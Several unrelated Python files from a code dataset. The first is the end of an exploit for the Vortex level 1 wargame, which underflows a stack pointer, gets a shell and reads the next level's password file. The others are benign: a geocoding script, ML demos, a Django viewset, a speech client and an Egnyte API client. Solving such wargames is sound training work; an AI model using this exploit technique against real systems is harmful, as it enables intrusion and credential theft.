# Stack layout looks like this:
# -00000214 ptr dd ?
# -00000210 char dd ?
# -0000020C buffer db 512 dup(?)
#
# We start out in the middle of buffer
off_buffer = -0x20c
off_ptr = -0x214
ptr = off_buffer+0x100
r.send('\\' * (ptr-off_ptr-3)) # Underflow PTR, -3 so we set the high byte.
r.send('\xca') # Write the byte
r.send('\\') # Move backward again to undo the ++
r.send('\xca') # Send any byte at all, triggers e()
r.clean()
time.sleep(1)
# Win
r.send('id\n')
log.success('id: %s' % r.recv().strip())
r.send('cat /etc/vortex_pass/vortex2\n')
password = r.recv().strip()
log.success('Password: %s' % password)
print password
|
StarcoderdataPython
|
1662981
|
<filename>scripts/backfill.py
import os
from loguru import logger
import googlemaps
import pandas as pd
from create_ltc_ids import drop_dupes, create_hash
google_key = os.getenv("GOOGLE_API_KEY")
if google_key is None:
raise ValueError("you must set a value for the GOOGLE_API_KEY env variable")
gmaps = googlemaps.Client(key=google_key)
def geocode_address(record):
query = record["address"]
try:
result = gmaps.geocode(query)
except Exception as err:
logger.error("geocode call failed for query %s with error: %s" % (query, err))
return record
if not result:
logger.error("could not find coordinates in geocode result for query %s" % query)
return record
g = result[0]
if not 'geometry' in g:
logger.error("could not find coordinates in geocode result for query %s" % query)
return record
latlon = g.get("geometry").get("location")
record['address'] = g.get("formatted_address") if g.get("formatted_address") else ''
record['lat'] = latlon.get("lat") if latlon.get("lat") else ''
record['lon'] = latlon.get("lng") if latlon.get("lng") else ''
return record
def generate_records():
with open("facilities_not_found.txt", "r") as f:
with open("backfill-address.txt", "r") as b:
lines = f.read().splitlines()
addresses = b.read().splitlines()
records = [ ]
for i in range(len(lines)):
info = lines[i].rsplit("query")[1].strip().replace("LLC,", "").split(",")
record = { }
record["facility_name"] = info[0]
record["address"] = addresses[i]
if "County" in info[1]:
record["county"] = info[1]
record["state"] = info[2]
elif len(info) == 2:
record["state"] = info[1]
elif len(info) == 3:
record["city"] = info[1]
record["state"] = info[2]
else:
record["city"] = info[1]
record["county"] = info[2]
record["state"] = info[3]
records.append(record)
return records
def main():
records = generate_records()
df = pd.DataFrame(records)
df = drop_dupes(df)
df = df.apply(create_hash, axis = 1)
df = df.apply(geocode_address, axis = 1)
df.to_csv('ltc_geocoded_hashed_backfill.csv')
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
1709535
|
<reponame>franneck94/UdemyGAN
from tensorflow.keras.layers import Activation
from tensorflow.keras.layers import Conv2D
from tensorflow.keras.layers import Dense
from tensorflow.keras.layers import Flatten
from tensorflow.keras.layers import Input
from tensorflow.keras.layers import MaxPooling2D
from tensorflow.keras.models import Model
from tensorflow.keras.models import Sequential
def build_cnn():
img_shape = (28, 28, 1)
# Define the CNN
model = Sequential()
# Conv Block 1
model.add(Conv2D(filters=32, kernel_size=7, input_shape=img_shape))
model.add(Conv2D(filters=32, kernel_size=5))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Activation("relu"))
# Conv Block 2
model.add(Conv2D(filters=64, kernel_size=5))
model.add(Conv2D(filters=128, kernel_size=3))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Activation("relu"))
# Fully connected layer 1
model.add(Flatten())
model.add(Dense(units=512))
model.add(Activation("relu"))
# Fully connected layer 1
model.add(Dense(units=256))
model.add(Activation("relu"))
# Output layer
model.add(Dense(units=10))
model.add(Activation("softmax"))
# Print the CNN layers
# model.summary()
# Model object
img = Input(shape=img_shape)
pred = model(img)
return Model(inputs=img, outputs=pred)
|
StarcoderdataPython
|
103052
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name:decomposition
Description : 数据降维实例
旨在说明使用方法
Email : <EMAIL>
Date:2018/1/2
"""
from collections import namedtuple
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.datasets import make_classification
from sklearn.decomposition import (PCA, IncrementalPCA, FactorAnalysis, FastICA, KernelPCA, SparsePCA, MiniBatchSparsePCA, MiniBatchDictionaryLearning,
DictionaryLearning)
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
# data
X, y = make_classification(
n_samples=1000, n_features=5, n_informative=2, n_redundant=0, n_repeated=0, n_classes=3, n_clusters_per_class=1, class_sep=1.5, flip_y=0.01, random_state=0)
# 初始设置
sns.set(style='whitegrid')
color_series = sns.color_palette('Set2', 3)
names = 'class1', 'class2', 'class3'
# plot func
def plot_func(title, colors=color_series, class_names=names, labels=(0, 1, 2)):
"""绘图函数
用于给降维前后的数据进行绘图,以便于做对比
Parameters
----------
:param colors: list
列表形式的颜色集合
:param labels: list or tuple
列表形式的标签集合
:param class_names: str list or tuple
列表形式的类别名集合
:param title: str
绘图的 title
Returns
-------
graph
返回图像
"""
for color, label, class_name in zip(colors, labels, class_names):
plt.scatter(X[y == label, 0], X[y == label, 1], color=color, label=class_name)
plt.title(title)
plt.legend(loc='best')
# 转换前的可视化, 只显示前两维度的数据
plt.figure(1)
plot_func('origin data')
# KernelPCA 是非线性降维, LDA 只能用于分类降维
# ICA 通常不用于降低维度,而是用于分离叠加信号
models_list = [('LDA', LinearDiscriminantAnalysis(n_components=2)), ('PCA', PCA(n_components=2, random_state=0)),
('PCARand', PCA(n_components=2, random_state=0, svd_solver='randomized')),
('IncrementalPCA', IncrementalPCA(n_components=2, batch_size=10, whiten=True)), ('FactorAnalysis', FactorAnalysis(n_components=2, max_iter=500)),
('FastICA', FastICA(n_components=2, random_state=0)), ('KernelPCA', KernelPCA(n_components=2, random_state=0, kernel='rbf')),
('SparsePCA', SparsePCA(n_components=2, random_state=0, verbose=True)),
('MiniBatchSparsePCA', MiniBatchSparsePCA(n_components=2, verbose=True, batch_size=10, random_state=0)),
('DictionaryLearning', DictionaryLearning(n_components=2, verbose=True, random_state=0)),
('MiniBatchDictionaryLearning', MiniBatchDictionaryLearning(n_components=2, batch_size=5, random_state=0, alpha=0.1))]
model = namedtuple('models', ['mod_name', 'mod_ins'])
for i in range(len(models_list)):
mod = model(*models_list[i])
if mod.mod_name == 'LDA':
mod.mod_ins.fit(X, y)
X_new = mod.mod_ins.transform(X)
else:
X_new = mod.mod_ins.fit_transform(X)
plt.figure(i + 2)
plot_func(mod.mod_name + ' transformed data')
print(mod.mod_name + 'finished!')
plt.show()
|
StarcoderdataPython
|
4807145
|
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt # noqa: E402
class ConvergenceChecker(object):
def __init__(self, min_iters=3, max_iters=int(1e13), min_confirmations=1):
assert min_confirmations > 0
self.min_iters = min(max(min_iters, 1 + 2 * min_confirmations),
max_iters)
self.max_iters = max_iters
self.min_confirmations = min_confirmations
assert isinstance(self.min_iters, int)
assert isinstance(self.max_iters, int)
assert isinstance(self.min_confirmations, int)
self.reset()
def __len__(self):
return len(self.values)
def reset(self):
self.values = []
self._is_converged = False
self._logged_lr = np.inf
@property
def values_of_interest(self):
return self.values[self.min_confirmations:]
def check(self, value=0, lr=1):
if self.is_best(value):
self._logged_lr = lr
elif lr > 2 * self._logged_lr:
return False
self.values.append(value)
n = len(self.values)
if n < self.min_iters:
return False
elif n >= self.max_iters:
self._is_converged = True
return True
self._is_converged = self._is_converged or \
(self.get_nbr_confirmations() >= self.min_confirmations)
return self._is_converged
def get_best(self):
n = len(self.values)
if n <= self.min_confirmations:
return - np.inf
return np.min(self.values_of_interest)
def is_best(self, value):
n = len(self.values)
if n < self.min_confirmations:
return False
if n == self.min_confirmations:
return True
return np.min(self.values_of_interest) >= value
def is_converged(self):
return self._is_converged
def get_nbr_confirmations(self):
if len(self.values) < self.min_confirmations + 1:
return 0
return len(self.values_of_interest) - \
np.argmin(self.values_of_interest) - 1
def next_value_ignored(self):
n = len(self.values)
if n < self.min_confirmations:
return True
return False
def create_plot(self, plot_name):
plt.close()
plt.plot(np.arange(len(self.values)), self.values)
plt.axvline(x=self.min_confirmations - 0.5)
plt.axvline(x=len(self.values) - self.min_confirmations - 0.5)
plt.savefig(plot_name)
|
StarcoderdataPython
|
1755739
|
<reponame>genialis/resolwe<gh_stars>10-100
"""Data viewset."""
from django.db.models import Prefetch, Q
from rest_framework import exceptions, mixins, viewsets
from rest_framework.decorators import action
from rest_framework.response import Response
from resolwe.flow.filters import DataFilter
from resolwe.flow.models import Collection, Data, DescriptorSchema, Entity, Process
from resolwe.flow.models.utils import fill_with_defaults
from resolwe.flow.serializers import DataSerializer
from resolwe.flow.utils import get_data_checksum
from resolwe.permissions.loader import get_permissions_class
from resolwe.permissions.mixins import ResolwePermissionsMixin
from resolwe.permissions.models import Permission, PermissionModel
from resolwe.permissions.utils import get_anonymous_user, get_user
from .mixins import (
ParametersMixin,
ResolweCheckSlugMixin,
ResolweCreateModelMixin,
ResolweUpdateModelMixin,
)
from .utils import get_collection_for_user
class DataViewSet(
ResolweCreateModelMixin,
mixins.ListModelMixin,
mixins.RetrieveModelMixin,
ResolweUpdateModelMixin,
mixins.DestroyModelMixin,
ResolwePermissionsMixin,
ResolweCheckSlugMixin,
ParametersMixin,
viewsets.GenericViewSet,
):
"""API view for :class:`Data` objects."""
qs_permission_model = PermissionModel.objects.select_related("user", "group")
qs_collection_ds = DescriptorSchema.objects.select_related("contributor")
qs_collection = Collection.objects.select_related("contributor")
qs_collection = qs_collection.prefetch_related(
"data",
"entity_set",
Prefetch("descriptor_schema", queryset=qs_collection_ds),
)
qs_descriptor_schema = DescriptorSchema.objects.select_related("contributor")
qs_entity_col_ds = DescriptorSchema.objects.select_related("contributor")
qs_entity_col = Collection.objects.select_related("contributor")
qs_entity_col = qs_entity_col.prefetch_related(
"data",
"entity_set",
Prefetch("descriptor_schema", queryset=qs_entity_col_ds),
)
qs_entity_ds = DescriptorSchema.objects.select_related("contributor")
qs_entity = Entity.objects.select_related("contributor")
qs_entity = qs_entity.prefetch_related(
"data",
Prefetch("collection", queryset=qs_entity_col),
Prefetch("descriptor_schema", queryset=qs_entity_ds),
)
qs_process = Process.objects.select_related("contributor")
queryset = Data.objects.select_related("contributor")
serializer_class = DataSerializer
filter_class = DataFilter
permission_classes = (get_permissions_class(),)
ordering_fields = (
"contributor",
"contributor__first_name",
"contributor__last_name",
"created",
"finished",
"id",
"modified",
"name",
"process__name",
"process__type",
"started",
)
ordering = "-created"
def get_queryset(self):
"""Get the queryset for the given request.
Prefetch only permissions for the given user, not all of them. This is
only possible with the request in the context.
"""
user = get_user(self.request.user)
filters = Q(user=user) | Q(group__in=user.groups.all())
anonymous_user = get_anonymous_user()
if user != anonymous_user:
filters |= Q(user=anonymous_user)
qs_permission_model = self.qs_permission_model.filter(filters)
return self.queryset.prefetch_related(
Prefetch("collection", queryset=self.qs_collection),
Prefetch("descriptor_schema", queryset=self.qs_descriptor_schema),
Prefetch("entity", queryset=self.qs_entity),
Prefetch("process", queryset=self.qs_process),
Prefetch("permission_group__permissions", queryset=qs_permission_model),
)
@action(detail=False, methods=["post"])
def duplicate(self, request, *args, **kwargs):
"""Duplicate (make copy of) ``Data`` objects."""
if not request.user.is_authenticated:
raise exceptions.NotFound
inherit_collection = request.data.get("inherit_collection", False)
ids = self.get_ids(request.data)
queryset = Data.objects.filter(id__in=ids).filter_for_user(
request.user, Permission.VIEW
)
actual_ids = queryset.values_list("id", flat=True)
missing_ids = list(set(ids) - set(actual_ids))
if missing_ids:
raise exceptions.ParseError(
"Data objects with the following ids not found: {}".format(
", ".join(map(str, missing_ids))
)
)
duplicated = queryset.duplicate(
contributor=request.user,
inherit_collection=inherit_collection,
)
serializer = self.get_serializer(duplicated, many=True)
return Response(serializer.data)
@action(detail=False, methods=["post"])
def get_or_create(self, request, *args, **kwargs):
"""Get ``Data`` object if similar already exists, otherwise create it."""
response = self.perform_get_or_create(request, *args, **kwargs)
if response:
return response
return super().create(request, *args, **kwargs)
def perform_get_or_create(self, request, *args, **kwargs):
"""Perform "get_or_create" - return existing object if found."""
self.define_contributor(request)
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
process = serializer.validated_data.get("process")
process_input = request.data.get("input", {})
fill_with_defaults(process_input, process.input_schema)
checksum = get_data_checksum(process_input, process.slug, process.version)
data_qs = Data.objects.filter(
checksum=checksum,
process__persistence__in=[
Process.PERSISTENCE_CACHED,
Process.PERSISTENCE_TEMP,
],
)
data_qs = data_qs.filter_for_user(request.user)
if data_qs.exists():
data = data_qs.order_by("created").last()
serializer = self.get_serializer(data)
return Response(serializer.data)
def _parents_children(self, request, queryset):
"""Process given queryset and return serialized objects."""
queryset = queryset.filter_for_user(request.user)
page = self.paginate_queryset(queryset)
if page is not None:
serializer = self.get_serializer(page, many=True)
return self.get_paginated_response(serializer.data)
serializer = self.get_serializer(queryset, many=True)
return Response(serializer.data)
@action(detail=True)
def parents(self, request, pk=None):
"""Return parents of the current data object."""
return self._parents_children(request, self.get_object().parents)
@action(detail=True)
def children(self, request, pk=None):
"""Return children of the current data object."""
return self._parents_children(request, self.get_object().children.all())
@action(detail=False, methods=["post"])
def move_to_collection(self, request, *args, **kwargs):
"""Move data objects to destination collection."""
ids = self.get_ids(request.data)
dst_collection_id = self.get_id(request.data, "destination_collection")
dst_collection = get_collection_for_user(dst_collection_id, request.user)
queryset = self._get_data(request.user, ids)
queryset.move_to_collection(dst_collection)
return Response()
def _get_data(self, user, ids):
"""Return data objects queryset based on provided ids."""
queryset = Data.objects.filter(id__in=ids).filter_for_user(user)
actual_ids = queryset.values_list("id", flat=True)
missing_ids = list(set(ids) - set(actual_ids))
if missing_ids:
raise exceptions.ParseError(
"Data objects with the following ids not found: {}".format(
", ".join(map(str, missing_ids))
)
)
for data in queryset:
collection = data.collection
if collection and not user.has_perm(Permission.EDIT, obj=collection):
if user.is_authenticated:
raise exceptions.PermissionDenied()
else:
raise exceptions.NotFound()
return queryset
|
StarcoderdataPython
|
44648
|
<filename>src/google-cloud-speech/python/client.py
#!/usr/bin/env python3
import sys
from google.cloud import speech as google_cloud_speech
# Create the object representing the API to the client.
client = google_cloud_speech.SpeechClient ()
content = open (sys.argv [1], 'rb').read ()
audio = google_cloud_speech.RecognitionAudio (content = content)
config = google_cloud_speech.RecognitionConfig (language_code = 'en-US')
# Call the service to perform speech recognition.
result = client.recognize (config = config, audio = audio)
print (result)
|
StarcoderdataPython
|
81292
|
from __future__ import unicode_literals
import collections
import six
from egnyte import base, exc
class FileOrFolder(base.Resource):
"""Things that are common to both files and folders."""
_url_template = "pubapi/v1/fs%(path)s"
_lazy_attributes = {'name', 'folder_id', 'is_folder'}
def _action(self, action, destination):
exc.default.check_response(self._client.POST(self._url, dict(action=action, destination=destination)))
return self.__class__(self._client, path=destination)
def copy(self, destination):
"""Copy this to another path. Destination path should have all segments (including the last one)."""
return self._action('copy', destination)
def move(self, destination):
"""Move this to another path. Destination path should have all segments (including the last one)."""
return self._action('move', destination)
def link(self, accessibility, recipients=None, send_email=None, message=None,
copy_me=None, notify=None, link_to_current=None,
expiry_date=None, expiry_clicks=None, add_filename=None):
"""
Create a link.
* accessibility: Determines how the link can be accessed ('Anyone', 'Password', 'Domain', 'Recipients')
* send_email: If true, Egnyte will send the link by email.
* recipients: List email addresses for people who should receive the link. Only required if send_email is True (List of valid email addresses)
* message: Personal message to be sent in link email. Only applies if send_email is True (plain text)
* copy_me: If True, a copy of the link message will be sent to the link creator. Only applies if send_email is True.
* notify: If True, link creator will be notified via email when link is accessed.
* link_to_current: If True, link will always refer to current version of file. Only applicable for file links.
* expiry_date: The expiry date for the link. If expiry_date is specified, expiry_clicks cannot be set (future date as datetime.date or string in YYYY-MM-DD format)
* expiry_clicks: The number of times the link can be clicked before it stops working. If expiry_clicks is specified, expiry_date cannot be set (value must be between 1 - 10, inclusive)
* add_filename: If True then the filename will be appended to the end of the link. Only applies to file links, not folder links.
Will return sequence of created Links, one for each recipient.
"""
return Links(self._client).create(path=self.path, type=self._link_kind, accessibility=accessibility,
recipients=recipients, send_email=send_email, message=message,
copy_me=copy_me, notify=notify, link_to_current=link_to_current,
expiry_date=expiry_date, expiry_clicks=expiry_clicks, add_filename=add_filename)
def _get(self):
"""Get the right object type (File or Folder), depending on what this path points to in the Cloud File System"""
json = exc.default.check_json_response(self._client.GET(self._url))
if json['is_folder'] and not isinstance(self, Folder):
instance = Folder(self._client, path=self.path)
elif not json['is_folder'] and not isinstance(self, File):
instance = File(self._client, path=self.path)
else:
instance = self
instance._update_attributes(json)
if instance.is_folder:
instance.folders = [Folder(self._client, **folder_data) for folder_data in json.get('folders', ())]
instance.files = [File(self._client, **file_data) for file_data in json.get('files', ())]
return instance
class File(FileOrFolder):
"""
Wrapper for a file in the cloud.
Does not have to exist - this can represent a new file to be uploaded.
path - file path
"""
_upload_chunk_size = 100 * (1024 * 1024) # 100 MB
_upload_retries = 3
_link_kind = 'file'
_lazy_attributes = {'num_versions', 'name', 'checksum', 'last_modified', 'entry_id',
'uploaded_by', 'size', 'is_folder', 'versions'}
_url_template_content = "pubapi/v1/fs-content%(path)s"
_url_template_content_chunked = "pubapi/v1/fs-content-chunked%(path)s"
def upload(self, fp, size=None, progress_callback=None):
"""
Upload file contents.
fp can be any file-like object, but if you don't specify it's size in advance it must support tell and seek methods.
Progress callback is optional - if provided, it should match signature of ProgressCallbacks.upload_progress
"""
if isinstance(fp, six.binary_type):
fp = six.BytesIO(fp)
if size is None:
size = base.get_file_size(fp)
if size < self._upload_chunk_size:
# simple, one request upload
retries = max(self._upload_retries, 1)
while retries > 0:
url = self._client.get_url(self._url_template_content, path=self.path)
chunk = base._FileChunk(fp, 0, size)
r = self._client.POST(url, data=chunk, headers={'Content-length': str(size)})
exc.default.check_response(r)
server_sha = r.headers['X-Sha512-Checksum']
our_sha = chunk.sha.hexdigest()
if server_sha == our_sha:
break
retries -= 1
# TODO: retry network errors too
if retries == 0:
raise exc.ChecksumError("Failed to upload file", {})
else: # chunked upload
return self._chunked_upload(fp, size, progress_callback)
def download(self, download_range=None):
"""
Download file contents.
Returns a FileDownload.
Optional range is 2 integer sequence (start offset, end offset) used to download only part of the file.
"""
url = self._client.get_url(self._url_template_content, path=self.path)
if download_range is None:
r = exc.default.check_response(self._client.GET(url, stream=True))
else:
if len(download_range) != 2:
raise exc.InvalidParameters('Download range needs to be None or a 2 element integer sequence')
r = exc.partial.check_response(self._client.GET(url, stream=True, headers={'Range': 'bytes=%d-%d' % download_range}))
return base.FileDownload(r, self)
def _chunked_upload(self, fp, size, progress_callback):
url = self._client.get_url(self._url_template_content_chunked, path=self.path)
chunks = list(base.split_file_into_chunks(fp, size, self._upload_chunk_size)) # need count of chunks
chunk_count = len(chunks)
headers = {}
for chunk_number, chunk in enumerate(chunks, 1): # count from 1 not 0
headers['x-egnyte-chunk-num'] = "%d" % chunk_number
headers['content-length'] = str(chunk.size)
if chunk_number == chunk_count: # last chunk
headers['x-egnyte-last-chunk'] = "true"
retries = max(self._upload_retries, 1)
while retries > 0:
try:
r = self._client.POST(url, data=chunk, headers=headers)
server_sha = r.headers['x-egnyte-chunk-sha512-checksum']
our_sha = chunk.sha.hexdigest()
if server_sha == our_sha:
break
except:
print("_chunked_upload error on POST request to upload chunk, will retry")
retries -= 1
# TODO: retry network errors too
# TODO: refactor common parts of chunked and standard upload
if retries == 0:
raise exc.ChecksumError("Failed to upload file chunk", {"chunk_number": chunk_number, "start_position": chunk.position})
exc.default.check_response(r)
if chunk_number == 1:
headers['x-egnyte-upload-id'] = r.headers['x-egnyte-upload-id']
if progress_callback is not None:
progress_callback(self, size, chunk_number * self._upload_chunk_size)
def delete(self):
"""Delete this file."""
base.Resource.delete(self)
def add_note(self, message):
"""Add a note to this file. Returns the created Note object."""
return self._client.notes.create(self.path, message)
def get_notes(self, **kwargs):
"""Get notes attached to this file. Returns list of Note objects"""
return self._client.notes.list(file=self.path, **kwargs)
class Folder(FileOrFolder):
"""
Wrapper for a folder the cloud.
Does not have to exist - can represent a new folder yet to be created.
"""
_url_template = "pubapi/v1/fs%(path)s"
_url_template_permissions = "pubapi/v1/perms/folder/%(path)s"
_url_template_effective_permissions = "pubapi/v1/perms/user/%(username)s"
_lazy_attributes = {'name', 'folder_id', 'is_folder'}
_link_kind = 'folder'
folders = None
files = None
def folder(self, path, **kwargs):
"""Return a subfolder of this folder."""
return Folder(self._client, path=self.path + '/' + path, **kwargs)
def file(self, filename, **kwargs):
"""Return a file in this folder."""
return File(self._client, folder=self, filename=filename, path=self.path + '/' + filename, **kwargs)
def create(self, ignore_if_exists=True):
"""
Create a new folder in the Egnyte cloud.
If ignore_if_exists is True, error raised if folder already exists will be ignored.
"""
r = self._client.POST(self._url, dict(action='add_folder'))
(exc.created_ignore_existing if ignore_if_exists else exc.created).check_response(r)
return self
def delete(self):
"""Delete this folder in the cloud."""
base.Resource.delete(self)
def list(self):
"""
Gets contents of this folder (in instance attributes 'folders' and 'files')
"""
return self._get()
def get_permissions(self, users=None, groups=None):
"""
Get Permission values for this folder.
"""
query_params = {}
if users is not None:
query_params[u'users'] = '|'.join(six.text_type(x) for x in users)
if groups is not None:
query_params[u'groups'] = '|'.join(six.text_type(x) for x in groups)
url = self._client.get_url(self._url_template_permissions, path=self.path)
r = exc.default.check_json_response(self._client.GET(url, params=query_params))
return PermissionSet(r)
def set_permissions(self, permission, users=None, groups=None):
"""
Set permission level for some users and/or groups for this folder.
"""
url = self._client.get_url(self._url_template_permissions, path=self.path)
data = base.filter_none_values(dict(permission=permission, users=users, groups=groups))
exc.default.check_response(self._client.POST(url, data))
def get_effective_permissions(self, username):
"""
Get effective permissions (both direct, and granted by membership in groups) to this folder for a specific user.
username: name of user (string)
Returns one of 'Owner', 'Full', 'Editor', 'Viewer'
"""
url = self._client.get_url(self._url_template_effective_permissions, username=username)
params = dict(folder=self.path)
r = exc.default.check_json_response(self._client.GET(url, params=params))
return r['permission']
def get_notes(self, **kwargs):
"""Get notes attached to any file in this folder."""
return self._client.notes.list(folder=self.path, **kwargs)
class Link(base.Resource):
"""Link to a file or folder"""
_url_template = "pubapi/v1/links/%(id)s"
_lazy_attributes = {'copy_me', 'link_to_current', 'accessibility', 'notify',
'path', 'creation_date', 'type', 'send_mail'}
def delete(self):
"""Delete this link"""
base.Resource.delete(self)
class User(base.Resource):
"""
Wrapper for a User.
Warning: attribute names in this class use camelCase instead of underscores.
Name is a dictionary with 2 keys: givenName and lastName.
"""
_url_template = "pubapi/v2/users/%(id)s"
_url_template_effective_permissions = "pubabi/v1/perms/user/%(userName)s"
_lazy_attributes = {'userName', 'externalId', 'email', 'name', 'active', 'locked', 'authType',
'role', 'userType', 'idpUserId'}
def delete(self):
"""Delete this user account."""
base.Resource.delete(self)
def update(self, email=None, familyName=None, givenName=None, active=None, sendInvite=None, authType=None,
userType=None, idpUserId=None, userPrincipalName=None):
"""
Modify this user account.
Optional parameters (no change if value is None):
* email: The email address of the user. Any valid email address (e.g. <EMAIL>)
* familyName: The last name of the user. Any plain text (e.g. John)
* givenName: The first name of the user. Any plain text (e.g. Smith)
* active: Whether the user is active or inactive. True or False
* sendInvite: If set to true when creating a user, an invitation email will be sent (if the user is created in active state). True or False
* authType: The authentication type for the user. 'ad' (AD), 'sso' (SAML SSO), 'egnyte' (Internal Egnyte)
* userType: The Egnyte role of the user. 'admin' (Administrator), 'power' (Power User), 'standard' (Standard User)
* idpUserId: Only required if the user is SSO authenticated and not using default user mapping. Do not specify if user is not SSO authenticated. This is the way the user is identified within the SAML Response from an SSO Identity Provider, i.e. the SAML Subject (e.g. jsmith)
* userPrincipalName: Do not specify if user is not AD authenticated. Used to bind child authentication policies to a user when using Active Directory authentication in a multi-domain setup (e.g. <EMAIL>)
"""
url = self._client.get_url(self._url_template, id=self.id)
name = base.filter_none_values(dict(familyName=familyName, givenName=givenName)) or None
data = base.filter_none_values(dict(email=email, active=active, name=name, sendInvite=sendInvite,
authType=authType, userType=userType, idpUserId=idpUserId,
userPrincipalName=userPrincipalName))
json = exc.default.check_json_response(self._client.PATCH(url, data))
self._update_attributes(json)
def get_effective_permissions(self, path):
url = self._client.get_url(self._url_template_effective_permissions, userName=self.userName)
r = exc.default.check_json_response(self._client.GET(url, params=dict(folder=path)))
return r
class Note(base.Resource):
"""Note attached to a file or folder."""
_url_template = "pubapi/v1/notes/%(id)s"
_lazy_attributes = {'file_id', 'file_path', 'can_delete', 'creation_time', 'message', 'username', 'formatted_name'}
def delete(self):
"""Delete this Note"""
base.Resource.delete(self)
def get_file(self):
"""Get the file to which this note is attached."""
return self._client.file(self.file_path)
class Group(base.Resource):
"""Group of users."""
_url_template = "pubapi/v2/groups/%(id)s"
_lazy_attributes = {'displayName', 'members'}
def delete(self):
"""Delete this Group"""
base.Resource.delete(self)
def full_update(self, displayName, members=None):
"""
Full update of this group.
This endpoint is used to overwrite all of the attributes of a group. This is especially useful for making a change to settings that ensures all prior settings are removed.
* displayName: Name of the group (string). Required
* members: List of members to be added to the new group (user ids or User objects). Optional.
"""
url = self._client.get_url(self._url_template, id=self.id)
data = dict(displayName=displayName)
if members is not None:
data['members'] = [dict(value=x.id if isinstance(x, User) else x) for x in members]
json = exc.default.check_json_response(self._client.PATCH(url, data))
self._update_attributes(json)
class Links(base.HasClient):
"""Link management API"""
_url_template = "pubapi/v1/links"
def create(self, path, type, accessibility,
recipients=None, send_email=None, message=None,
copy_me=None, notify=None, link_to_current=None,
expiry_date=None, expiry_clicks=None, add_filename=None,
):
"""
Create links.
* path: The absolute path of the destination file or folder.
* type: This determines what type of link will be created ('File' or 'Folder')
* accessibility: Determines who a link is accessible by ('Anyone', 'Password', 'Domain', 'Recipients')
* send_email: If True, the link will be sent via email by Egnyte.
* recipients: List email addresses of recipients of the link. Only required if send_email is True (List of valid email addresses)
* message: Personal message to be sent in link email. Only applies if send_email is True (plain text)
* copy_me: If True, a copy of the link message will be sent to the link creator. Only applies if send_email is True.
* notify: If True, link creator will be notified via email when link is accessed.
* link_to_current: If True, link will always refer to current version of file. Only applicable for file links.
* expiry_date: The expiry date for the link. If expiry_date is specified, expiry_clicks cannot be set (future date as datetime.date or string in YYYY-MM-DD format)
* expiry_clicks: The number of clicks the link is valid for. If expiry_clicks is specified, expiry_date cannot be set (value must be between 1 - 10, inclusive)
* add_filename: If True then the filename will be appended to the end of the link. Only applies to file links, not folder links.
Will return a sequence of created Links, one for each recipient.
"""
url = self._client.get_url(self._url_template)
data = base.filter_none_values(dict(path=path, type=type, accessibility=accessibility, send_email=send_email,
copy_me=copy_me, notify=notify, add_filename=add_filename, link_to_current=link_to_current,
expiry_clicks=expiry_clicks, expiry_date=base.date_format(expiry_date),
recipients=recipients, message=message))
response = exc.default.check_json_response(self._client.POST(url, data))
# This response has weird structure
links = response.pop('links')
result = []
for l in links:
l.update(response)
result.append(Link(self._client, **l))
return result
def get(self, id):
"""Get a Link object by it's id"""
return Link(self._client, id=id)
def list(self, path=None, username=None, created_before=None, created_after=None, type=None, accessibility=None,
offset=None, count=None):
"""
Search links that match following optional conditions:
* path: List links to this file or folder (Full absolute path of destination file or folder)
* username: List links created by this user (Any username from your Egnyte account)
* created_before: List links created before this date (datetime.date, or string in YYYY-MM-DD format)
* created_after: List links created after this date (datetime.date, or string in YYYY-MM-DD format)
* type: Links of selected type will be shown ('File' or 'Folder')
* accessibility: Links of selected accessibility will be shown ('Anyone', 'Password', 'Domain', or 'Recipients')
* offset: Start at this link, where offset=0 means start with first link.
* count: Send this number of links. If not specified, all links will be sent.
Returns a list of Link objects, with additional total_count and offset attributes.
"""
url = self._client.get_url(self._url_template)
params = base.filter_none_values(dict(path=path, username=username, created_before=base.date_format(created_before),
created_after=base.date_format(created_after), type=type, accessibility=accessibility,
offset=offset, count=count))
json = exc.default.check_json_response(self._client.GET(url, params=params))
return base.ResultList((Link(self._client, id=id) for id in json.get('ids', ())), json['total_count'], json['offset'])
class Users(base.HasClient):
"""User management API"""
_url_template = "pubapi/v2/users"
def list(self, email=None, externalId=None, userName=None, startIndex=None, count=None):
"""
Search users. Optional search parameters are 'email', 'externalId' and 'userName'.
startIndex (starts with 1) and count may be used for pagination
Returns a list of User objects, with additional total_count and offset attributes.
"""
url = self._client.get_url(self._url_template)
filters = base.filter_none_values(dict(email=email, externalId=externalId, userName=userName))
params = base.filter_none_values(dict(startIndex=startIndex, count=count))
params['filter'] = [u'%s eq "%s"' % (k, v) for (k, v) in filters.items()]
json = exc.default.check_json_response(self._client.GET(url, params=params))
return base.ResultList((User(self._client, **d) for d in json.get('resources', ())), json['totalResults'], json['startIndex'] - 1)
def get(self, id):
"""Get a User object by id. Does not check if User exists."""
return User(self._client, id=id)
def by_email(self, email):
"""Get a User object by email. Returns None if user does not exist"""
try:
return self.list(email=email)[0]
except LookupError:
pass
def by_username(self, userName):
"""Get a User object by username. Returns None if user does not exist"""
try:
return self.list(userName=userName)[0]
except LookupError:
pass
def create(self, userName, externalId, email, familyName, givenName, active=True, sendInvite=True, authType='egnyte',
userType='power', role=None, idpUserId=None, userPrincipalName=None):
"""
Create a new user account. Parameters:
* userName: The Egnyte username for the user. Username must start with a letter or digit. Special characters are not supported (with the exception of periods, hyphens, and underscores).
* externalId: This is an immutable unique identifier provided by the API consumer. Any plain text (e.g. S-1-5-21-3623811015-3361044348-30300820-1013)
* email: The email address of the user. Any valid email address (e.g. <EMAIL>)
* familyName: The last name of the user. Any plain text (e.g. John)
* givenName: The first name of the user. Any plain text (e.g. Smith)
* active: Whether the user is active or inactive. True or False
* sendInvite: If set to true when creating a user, an invitation email will be sent (if the user is created in active state). True or False
* authType: The authentication type for the user. 'ad' (AD), 'sso' (SAML SSO), 'egnyte' (Internal Egnyte)
* userType: The type of the user. 'admin' (Administrator), 'power' (Power User), 'standard' (Standard User)
* role: The role assigned to the user. Only applicable for Power Users. Default or custom role name
